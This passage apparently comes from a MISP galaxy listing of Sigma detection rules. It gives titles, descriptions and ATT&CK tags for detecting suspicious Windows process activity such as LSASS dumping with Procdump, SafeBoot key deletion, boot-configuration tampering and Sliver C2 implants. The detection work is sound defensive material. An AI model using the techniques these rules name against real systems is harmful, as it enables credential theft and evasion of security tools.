author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/03/14
falsepositive ['Unknown']
filename proc_creation_win_sysinternals_adexplorer_susp_execution.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.credential_access', 'attack.t1552.001', 'attack.t1003.003']

SafeBoot Registry Key Deleted Via Reg.EXE

Detects execution of "reg.exe" commands with the "delete" flag on safe boot registry keys. Often used by attackers to prevent safe boot execution of security products

Internal MISP references

UUID fc0e89b5-adb0-43c1-b749-c12a10ec37de which can be used as unique global reference for SafeBoot Registry Key Deleted Via Reg.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems), Tim Shelton
creation_date 2022/08/08
falsepositive ['Unlikely']
filename proc_creation_win_reg_delete_safeboot.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.001']

Renamed AutoIt Execution

Detects the execution of a renamed AutoIt2.exe or AutoIt3.exe. AutoIt is a scripting language and automation tool for Windows systems. While primarily used for legitimate automation tasks, it can be misused in cyber attacks. Attackers can leverage AutoIt to create and distribute malware, including keyloggers, spyware, and botnets. A renamed AutoIt executable is particularly suspicious.

Internal MISP references

UUID f4264e47-f522-4c38-a420-04525d5b880f which can be used as unique global reference for Renamed AutoIt Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2023/06/04
falsepositive ['Unknown']
filename proc_creation_win_renamed_autoit.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1027']

Service Security Descriptor Tampering Via Sc.EXE

Detects the sc.exe utility adding a new service with special permissions that hide that service.

Internal MISP references

UUID 98c5aeef-32d5-492f-b174-64a691896d25 which can be used as unique global reference for Service Security Descriptor Tampering Via Sc.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/02/28
falsepositive ['Unknown']
filename proc_creation_win_sc_sdset_modification.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.persistence', 'attack.defense_evasion', 'attack.privilege_escalation', 'attack.t1574.011']

PktMon.EXE Execution

Detects execution of PktMon, a tool that captures network packets.

Internal MISP references

UUID f956c7c1-0f60-4bc5-b7d7-b39ab3c08908 which can be used as unique global reference for PktMon.EXE Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/03/17
falsepositive ['Legitimate use']
filename proc_creation_win_pktmon_execution.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.credential_access', 'attack.t1040']

Msxsl.EXE Execution

Detects the execution of the MSXSL utility. This can be used to execute Extensible Stylesheet Language (XSL) files. These files are commonly used to describe the processing and rendering of data within XML files. Adversaries can abuse this functionality to execute arbitrary files while potentially bypassing application whitelisting defenses.

Internal MISP references

UUID 9e50a8b3-dd05-4eb8-9153-bdb6b79d50b0 which can be used as unique global reference for Msxsl.EXE Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Timur Zinniatullin, oscd.community
creation_date 2019/10/21
falsepositive ['Msxsl is not installed by default and is deprecated, so unlikely on most systems.']
filename proc_creation_win_msxsl_execution.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1220']

PrintBrm ZIP Creation or Extraction

Detects the execution of the LOLBIN PrintBrm.exe, which can be used to create or extract ZIP files. PrintBrm.exe should not be run on a normal workstation.

Internal MISP references

UUID cafeeba3-01da-4ab4-b6c4-a31b1d9730c7 which can be used as unique global reference for PrintBrm ZIP Creation of Extraction in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/05/02
falsepositive ['Unknown']
filename proc_creation_win_lolbin_printbrm.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.command_and_control', 'attack.t1105', 'attack.defense_evasion', 'attack.t1564.004']

Renamed ZOHO Dctask64 Execution

Detects a renamed dctask64.exe, a binary signed by ZOHO Corporation, used for process injection, command execution, or process creation.

Internal MISP references

UUID 340a090b-c4e9-412e-bb36-b4b16fe96f9b which can be used as unique global reference for Renamed ZOHO Dctask64 Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2020/01/28
falsepositive ['Unknown yet']
filename proc_creation_win_renamed_dctask64.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1036', 'attack.t1055.001', 'attack.t1202', 'attack.t1218']

Remote Access Tool - NetSupport Execution From Unusual Location

Detects execution of client32.exe (NetSupport RAT) from an unusual location (outside of 'C:\Program Files').

Internal MISP references

UUID 37e8d358-6408-4853-82f4-98333fca7014 which can be used as unique global reference for Remote Access Tool - NetSupport Execution From Unusual Location in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/09/19
falsepositive ['Unknown']
filename proc_creation_win_remote_access_tools_netsupport_susp_exec.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion']

File Download Via InstallUtil.EXE

Detects use of .NET InstallUtil.exe in order to download arbitrary files. The files will be written to "%LOCALAPPDATA%\Microsoft\Windows\INetCache\IE\"

Internal MISP references

UUID 75edd216-1939-4c73-8d61-7f3a0d85b5cc which can be used as unique global reference for File Download Via InstallUtil.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/08/19
falsepositive ['Unknown']
filename proc_creation_win_installutil_download.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218']

MSHTA Suspicious Execution 01

Detects suspicious mshta.exe execution patterns, sometimes involving file polyglotism.

Internal MISP references

UUID cc7abbd0-762b-41e3-8a26-57ad50d2eea3 which can be used as unique global reference for MSHTA Suspicious Execution 01 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Diego Perez (@darkquassar), Markus Neis, Swisscom (Improve Rule)
creation_date 2019/02/22
falsepositive ['False positives depend on scripts and administrative tools used in the monitored environment']
filename proc_creation_win_mshta_susp_execution.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1140', 'attack.t1218.005', 'attack.execution', 'attack.t1059.007', 'cve.2020.1599']

Csc.EXE Execution Form Potentially Suspicious Parent

Detects a potentially suspicious parent of "csc.exe", which could be a sign of payload delivery.

Internal MISP references

UUID b730a276-6b63-41b8-bcf8-55930c8fc6ee which can be used as unique global reference for Csc.EXE Execution Form Potentially Suspicious Parent in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems)
creation_date 2019/02/11
falsepositive ['Unknown']
filename proc_creation_win_csc_susp_parent.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059.005', 'attack.t1059.007', 'attack.defense_evasion', 'attack.t1218.005', 'attack.t1027.004']

New Root Certificate Installed Via Certutil.EXE

Detects execution of "certutil" with the "addstore" flag in order to install a new certificate on the system. Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.

Internal MISP references

UUID d2125259-ddea-4c1c-9c22-977eb5b29cf0 which can be used as unique global reference for New Root Certificate Installed Via Certutil.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author oscd.community, @redcanary, Zach Stanford @svch0st
creation_date 2023/03/05
falsepositive ["Help Desk or IT may need to manually add a corporate Root CA on occasion. Need to test if GPO push doesn't trigger FP"]
filename proc_creation_win_certutil_certificate_installation.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1553.004']

Suspicious X509Enrollment - Process Creation

Detects use of X509Enrollment.

Internal MISP references

UUID 114de787-4eb2-48cc-abdb-c0b449f93ea4 which can be used as unique global reference for Suspicious X509Enrollment - Process Creation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/12/23
falsepositive ['Legitimate administrative script']
filename proc_creation_win_powershell_x509enrollment.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1553.004']

Wlrmdr.EXE Uncommon Argument Or Child Process

Detects the execution of "Wlrmdr.exe" with the "-u" command line flag, which passes anything given to it as an argument to the ShellExecute API and would therefore allow an attacker to execute arbitrary binaries. This detection also covers any uncommon child processes spawned from "Wlrmdr.exe", as a supplement for environments that possess "ParentImage" telemetry.

Internal MISP references

UUID 9cfc00b6-bfb7-49ce-9781-ef78503154bb which can be used as unique global reference for Wlrmdr.EXE Uncommon Argument Or Child Process in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113, manasmbellani
creation_date 2022/02/16
falsepositive ['Unknown']
filename proc_creation_win_wlrmdr_uncommon_child_process.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218']

Renamed Msdt.EXE Execution

Detects the execution of a renamed "Msdt.exe" binary.

Internal MISP references

UUID bd1c6866-65fc-44b2-be51-5588fcff82b9 which can be used as unique global reference for Renamed Msdt.EXE Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author pH-T (Nextron Systems)
creation_date 2022/06/03
falsepositive ['Unlikely']
filename proc_creation_win_renamed_msdt.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1036.003']

HackTool - WinRM Access Via Evil-WinRM

Adversaries may use Valid Accounts to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.

Internal MISP references

UUID a197e378-d31b-41c0-9635-cfdf1c1bb423 which can be used as unique global reference for HackTool - WinRM Access Via Evil-WinRM in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/01/07
falsepositive ['Unknown']
filename proc_creation_win_hktl_evil_winrm.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.lateral_movement', 'attack.t1021.006']

UEFI Persistence Via Wpbbin - ProcessCreation

Detects execution of the binary "wpbbin", which is used as part of the UEFI-based persistence method described in the reference section.

Internal MISP references

UUID 4abc0ec4-db5a-412f-9632-26659cddf145 which can be used as unique global reference for UEFI Persistence Via Wpbbin - ProcessCreation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/07/18
falsepositive ['Legitimate usage of the file by hardware manufacturer such as lenovo (Thanks @0gtweet for the tip)']
filename proc_creation_win_wpbbin_potential_persistence.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.persistence', 'attack.defense_evasion', 'attack.t1542.001']

Process Reconnaissance Via Wmic.EXE

Detects the execution of "wmic" with the "process" flag, which an adversary might use to list processes running on the compromised host or to list installed software hotfixes and patches.

Internal MISP references

UUID 221b251a-357a-49a9-920a-271802777cc0 which can be used as unique global reference for Process Reconnaissance Via Wmic.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/01/01
falsepositive ['Unknown']
filename proc_creation_win_wmic_recon_process.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1047']

UtilityFunctions.ps1 Proxy Dll

Detects the use of a Microsoft signed script executing a managed DLL with PowerShell.

Internal MISP references

UUID 0403d67d-6227-4ea8-8145-4e72db7da120 which can be used as unique global reference for UtilityFunctions.ps1 Proxy Dll in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/05/28
falsepositive ['Unknown']
filename proc_creation_win_lolbin_utilityfunctions.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1216']

Suspicious Powercfg Execution To Change Lock Screen Timeout

Detects suspicious execution of 'Powercfg.exe' to change the lock screen timeout.

Internal MISP references

UUID f8d6a15e-4bc8-4c27-8e5d-2b10f0b73e5b which can be used as unique global reference for Suspicious Powercfg Execution To Change Lock Screen Timeout in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/11/18
falsepositive ['Unknown']
filename proc_creation_win_powercfg_execution.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion']

Potentially Suspicious Event Viewer Child Process

Detects uncommon or suspicious child processes of "eventvwr.exe", which might indicate a UAC bypass attempt.

Internal MISP references

UUID be344333-921d-4c4d-8bb8-e584cf584780 which can be used as unique global reference for Potentially Suspicious Event Viewer Child Process in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2017/03/19
falsepositive ['Unknown']
filename proc_creation_win_eventvwr_susp_child_process.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.privilege_escalation', 'attack.t1548.002', 'car.2019-04-001']

New User Created Via Net.EXE

Identifies the creation of local users via the net.exe command.

Internal MISP references

UUID cd219ff3-fa99-45d4-8380-a7d15116c6dc which can be used as unique global reference for New User Created Via Net.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Endgame, JHasenbusch (adapted to Sigma for oscd.community)
creation_date 2018/10/30
falsepositive ['Legitimate user creation.', 'Better use event IDs for user creation rather than command line rules.']
filename proc_creation_win_net_user_add.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.persistence', 'attack.t1136.001']

Potentially Suspicious ASP.NET Compilation Via AspNetCompiler

Detects execution of "aspnet_compiler.exe" with potentially suspicious paths for compilation.

Internal MISP references

UUID 9f50fe98-fe5c-4a2d-86c7-fad7f63ed622 which can be used as unique global reference for Potentially Suspicious ASP.NET Compilation Via AspNetCompiler in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/08/14
falsepositive ['Unknown']
filename proc_creation_win_aspnet_compiler_susp_paths.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1127']

Run Once Task Execution as Configured in Registry

Detects the execution of a Run Once task as configured in the registry.

Internal MISP references

UUID 198effb6-6c98-4d0c-9ea3-451fa143c45c which can be used as unique global reference for Run Once Task Execution as Configured in Registry in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Avneet Singh @v3t0_, oscd.community, Christopher Peacock @SecurePeacock (updated)
creation_date 2020/10/18
falsepositive ['Unknown']
filename proc_creation_win_runonce_execution.yml
level low
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1112']

Suspicious Execution of Powershell with Base64

Detects a command line that launches PowerShell with a base64-encoded payload.

Internal MISP references

UUID fb843269-508c-4b76-8b8d-88679db22ce7 which can be used as unique global reference for Suspicious Execution of Powershell with Base64 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/01/02
falsepositive ['Unknown']
filename proc_creation_win_powershell_encode.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059.001']

Certificate Exported Via Certutil.EXE

Detects the execution of certutil with the "exportPFX" flag, which allows the utility to export certificates.

Internal MISP references

UUID 3ffd6f51-e6c1-47b7-94b4-c1e61d4117c5 which can be used as unique global reference for Certificate Exported Via Certutil.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/02/15
falsepositive ["There are legitimate reasons to export certificates. Investigate the activity to determine if it's benign"]
filename proc_creation_win_certutil_export_pfx.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1027']

Potential PsExec Remote Execution

Detects potential PsExec commands that initiate execution on remote systems via common command line flags used by the utility.

Internal MISP references

UUID ea011323-7045-460b-b2d7-0f7442ea6b38 which can be used as unique global reference for Potential PsExec Remote Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/02/28
falsepositive ['Unknown']
filename proc_creation_win_sysinternals_psexec_remote_execution.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.resource_development', 'attack.t1587.001']

Whoami.EXE Execution With Output Option

Detects the execution of "whoami.exe" with the "/FO" flag to choose CSV as output format or with redirection options to export the results to a file for later use.

Internal MISP references

UUID c30fb093-1109-4dc8-88a8-b30d11c95a5d which can be used as unique global reference for Whoami.EXE Execution With Output Option in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/02/28
falsepositive ['Unknown']
filename proc_creation_win_whoami_output.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.discovery', 'attack.t1033', 'car.2016-03-001']

Potential Process Execution Proxy Via CL_Invocation.ps1

Detects calls to "SyncInvoke", which is part of the "CL_Invocation.ps1" script, to proxy execution using "System.Diagnostics.Process".

Internal MISP references

UUID a0459f02-ac51-4c09-b511-b8c9203fc429 which can be used as unique global reference for Potential Process Execution Proxy Via CL_Invocation.ps1 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems), oscd.community, Natalia Shornikova
creation_date 2020/10/14
falsepositive ['Unknown']
filename proc_creation_win_powershell_cl_invocation.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1216']

Suspicious Microsoft OneNote Child Process

Detects suspicious child processes of the Microsoft OneNote application. This may indicate an attempt to execute malicious embedded objects from a .one file.

Internal MISP references

UUID c27515df-97a9-4162-8a60-dc0eeb51b775 which can be used as unique global reference for Suspicious Microsoft OneNote Child Process in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Tim Rauch (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), Elastic (idea)
creation_date 2022/10/21
falsepositive ['File located in the AppData folder with trusted signature']
filename proc_creation_win_office_onenote_susp_child_processes.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.t1566', 'attack.t1566.001', 'attack.initial_access']

Renamed FTP.EXE Execution

Detects the execution of a renamed "ftp.exe" binary based on the PE metadata fields.

Internal MISP references

UUID 277a4393-446c-449a-b0ed-7fdc7795244c which can be used as unique global reference for Renamed FTP.EXE Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Victor Sergeev, oscd.community
creation_date 2020/10/09
falsepositive ['Unknown']
filename proc_creation_win_renamed_ftp.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059', 'attack.defense_evasion', 'attack.t1202']

Potential LSASS Process Dump Via Procdump

Detects suspicious uses of the SysInternals Procdump utility by using a special command line parameter in combination with the lsass.exe process. This way we are also able to catch cases in which the attacker has renamed the procdump executable.

Internal MISP references

UUID 5afee48e-67dd-4e03-a783-f74259dcf998 which can be used as unique global reference for Potential LSASS Process Dump Via Procdump in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2018/10/30
falsepositive ['Unlikely, because no one should dump an lsass process memory', 'Another tool that uses command line flags similar to ProcDump']
filename proc_creation_win_sysinternals_procdump_lsass.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1036', 'attack.credential_access', 'attack.t1003.001', 'car.2013-05-009']

JSC Convert Javascript To Executable

Detects the execution of the LOLBIN jsc.exe, used by .NET to compile JavaScript code to .exe or .dll format.

Internal MISP references

UUID 52788a70-f1da-40dd-8fbd-73b5865d6568 which can be used as unique global reference for JSC Convert Javascript To Executable in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/05/02
falsepositive ['Unknown']
filename proc_creation_win_lolbin_jsc.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1127']

Potential Homoglyph Attack Using Lookalike Characters

Detects the presence of Unicode characters which are homoglyphs of, i.e. identical in appearance to, ASCII letter characters. This is used as an obfuscation and masquerading technique. Only "perfect" homoglyphs are included; these are characters that are indistinguishable from ASCII characters and thus make excellent candidates for homoglyph attacks.

Internal MISP references

UUID 32e280f1-8ad4-46ef-9e80-910657611fbc which can be used as unique global reference for Potential Homoglyph Attack Using Lookalike Characters in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Micah Babinski, @micahbabinski
creation_date 2023/05/07
falsepositive ['Commandlines with legitimate Cyrillic text; will likely require tuning (or not be usable) in countries where these alphabets are in use.']
filename proc_creation_win_susp_homoglyph_cyrillic_lookalikes.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1036', 'attack.t1036.003']

HackTool - Quarks PwDump Execution

Detects usage of the Quarks PwDump tool via command line arguments.

Internal MISP references

UUID 0685b176-c816-4837-8e7b-1216f346636b which can be used as unique global reference for HackTool - Quarks PwDump Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/09/05
falsepositive ['Unlikely']
filename proc_creation_win_hktl_quarks_pwdump.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.credential_access', 'attack.t1003.002']

Execute MSDT Via Answer File

Detects execution of "msdt.exe" using an answer file, which simulates the legitimate way of calling msdt via "pcwrun.exe" (for example from the compatibility tab).

Internal MISP references

UUID 9c8c7000-3065-44a8-a555-79bcba5d9955 which can be used as unique global reference for Execute MSDT Via Answer File in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/06/13
falsepositive ['Possible undocumented parents of "msdt" other than "pcwrun"']
filename proc_creation_win_lolbin_msdt_answer_file.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218', 'attack.execution']

Findstr Launching .lnk File

Detects usage of findstr to identify and execute a .lnk file, as seen in the HHS redirect attack.

Internal MISP references

UUID 33339be3-148b-4e16-af56-ad16ec6c7e7b which can be used as unique global reference for Findstr Launching .lnk File in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Trent Liffick
creation_date 2020/05/01
falsepositive ['Unknown']
filename proc_creation_win_findstr_lnk.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1036', 'attack.t1202', 'attack.t1027.003']

Suspicious ScreenSave Change by Reg.exe

Adversaries may establish persistence by executing malicious content triggered by user inactivity. Screensavers are programs that execute after a configurable period of user inactivity and consist of Portable Executable (PE) files with a .scr file extension.

Internal MISP references

UUID 0fc35fc3-efe6-4898-8a37-0b233339524f which can be used as unique global reference for Suspicious ScreenSave Change by Reg.exe in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/08/19
falsepositive ['GPO']
filename proc_creation_win_reg_screensaver.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.privilege_escalation', 'attack.t1546.002']

PowerShell Base64 Encoded FromBase64String Cmdlet

Detects usage of a base64-encoded "FromBase64String" cmdlet in a process command line.

Internal MISP references

UUID fdb62a13-9a81-4e5c-a38f-ea93a16f6d7c which can be used as unique global reference for PowerShell Base64 Encoded FromBase64String Cmdlet in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2019/08/24
falsepositive ['Unknown']
filename proc_creation_win_powershell_base64_frombase64string.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1140', 'attack.execution', 'attack.t1059.001']

Suspicious PowerShell Parameter Substring

Detects suspicious PowerShell invocation with a parameter substring.

Internal MISP references

UUID 36210e0d-5b19-485d-a087-c096088885f0 which can be used as unique global reference for Suspicious PowerShell Parameter Substring in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix)
creation_date 2019/01/16
falsepositive ['Unknown']
filename proc_creation_win_powershell_susp_parameter_variation.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059.001']

Boot Configuration Tampering Via Bcdedit.EXE

Detects the use of the bcdedit command to tamper with the boot configuration data. This technique is often used by malware or attackers as a destructive step before launching ransomware.

Internal MISP references

UUID 1444443e-6757-43e4-9ea4-c8fc705f79a2 which can be used as unique global reference for Boot Configuration Tampering Via Bcdedit.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community
creation_date 2019/10/24
falsepositive ['Unlikely']
filename proc_creation_win_bcdedit_boot_conf_tamper.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.impact', 'attack.t1490']

Code Execution via Pcwutl.dll

Detects the launch of an executable by calling the LaunchApplication function from the pcwutl.dll library.

Internal MISP references

UUID 9386d78a-7207-4048-9c9f-a93a7c2d1c05 which can be used as unique global reference for Code Execution via Pcwutl.dll in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Julia Fomina, oscd.community
creation_date 2020/10/05
falsepositive ['Use of Program Compatibility Troubleshooter Helper']
filename proc_creation_win_lolbin_pcwutl.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218.011']

Import PowerShell Modules From Suspicious Directories - ProcCreation

Detects PowerShell scripts that import modules from suspicious directories.

Internal MISP references

UUID c31364f7-8be6-4b77-8483-dd2b5a7b69a3 which can be used as unique global reference for Import PowerShell Modules From Suspicious Directories - ProcCreation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/01/10
falsepositive ['Unknown']
filename proc_creation_win_powershell_import_module_susp_dirs.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059.001']

Suspicious Spool Service Child Process

Detects suspicious print spool service (spoolsv.exe) child processes.

Internal MISP references

UUID dcdbc940-0bff-46b2-95f3-2d73f848e33b which can be used as unique global reference for Suspicious Spool Service Child Process in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Justin C. (@endisphotic), @dreadphones (detection), Thomas Patzke (Sigma rule)
creation_date 2021/07/11
falsepositive ['Unknown']
filename proc_creation_win_spoolsv_susp_child_processes.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1203', 'attack.privilege_escalation', 'attack.t1068']
Related clusters

To see the related clusters, click here.

HackTool - CrackMapExec PowerShell Obfuscation

The CrackMapExec pentesting framework implements a PowerShell obfuscation with some static strings detected by this rule.

Internal MISP references

UUID 6f8b3439-a203-45dc-a88b-abf57ea15ccf which can be used as unique global reference for HackTool - CrackMapExec PowerShell Obfuscation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Thomas Patzke
creation_date 2020/05/22
falsepositive ['Unknown']
filename proc_creation_win_hktl_crackmapexec_powershell_obfuscation.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059.001', 'attack.defense_evasion', 'attack.t1027.005']
Related clusters

To see the related clusters, click here.

HackTool - Sliver C2 Implant Activity Pattern

Detects process activity patterns as seen being used by Sliver C2 framework implants

Internal MISP references

UUID 42333b2c-b425-441c-b70e-99404a17170f which can be used as unique global reference for HackTool - Sliver C2 Implant Activity Pattern in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)
creation_date 2022/08/25
falsepositive ['Unlikely']
filename proc_creation_win_hktl_sliver_c2_execution_pattern.yml
level critical
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059']
Related clusters

To see the related clusters, click here.

Use of VisualUiaVerifyNative.exe

VisualUiaVerifyNative.exe is a Windows SDK that can be used for AWL bypass and is listed in Microsoft's recommended block rules.

Internal MISP references

UUID b30a8bc5-e21b-4ca2-9420-0a94019ac56a which can be used as unique global reference for Use of VisualUiaVerifyNative.exe in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Christopher Peacock @SecurePeacock, SCYTHE @scythe_io
creation_date 2022/06/01
falsepositive ['Legitimate testing of Microsoft UI parts.']
filename proc_creation_win_lolbin_visualuiaverifynative.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218']
Related clusters

To see the related clusters, click here.

Firewall Configuration Discovery Via Netsh.EXE

Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems

Internal MISP references

UUID 0e4164da-94bc-450d-a7be-a4b176179f1f which can be used as unique global reference for Firewall Configuration Discovery Via Netsh.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113, Christopher Peacock '@securepeacock', SCYTHE '@scythe_io'
creation_date 2021/12/07
falsepositive ['Administrative activity']
filename proc_creation_win_netsh_fw_rules_discovery.yml
level low
logsource.category process_creation
logsource.product windows
tags ['attack.discovery', 'attack.t1016']
Related clusters

To see the related clusters, click here.

Hacktool Execution - PE Metadata

Detects the execution of different Windows based hacktools via PE metadata (company, product, etc.) even if the files have been renamed

Internal MISP references

UUID 37c1333a-a0db-48be-b64b-7393b2386e3b which can be used as unique global reference for Hacktool Execution - PE Metadata in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
